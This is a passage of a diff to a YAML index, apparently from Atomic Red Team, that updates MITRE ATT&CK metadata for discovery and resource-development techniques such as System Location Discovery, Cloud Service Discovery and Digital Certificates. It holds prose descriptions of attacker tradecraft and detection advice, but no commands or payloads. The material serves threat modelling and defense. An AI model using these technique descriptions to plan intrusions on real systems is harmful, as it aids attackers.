       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -51328,7 +52020,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -51367,13 +52059,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -51414,87 +52104,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -51547,17 +52235,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -51565,10 +52252,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51577,15 +52266,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -51613,9 +52303,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests:
     - name: Azure - Dump Subscription Data with MicroBurst
@@ -51750,7 +52437,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -51822,7 +52508,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -51871,12 +52556,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51897,12 +52581,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51927,7 +52610,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51982,7 +52664,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -52002,7 +52684,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -52105,13 +52786,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52122,7 +52802,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52193,29 +52873,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -52239,15 +52918,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -52279,17 +52961,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52342,11 +53023,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52382,7 +53062,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -52431,43 +53111,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -52480,18 +53129,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -52513,7 +53193,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52529,8 +53209,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -52552,7 +53230,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
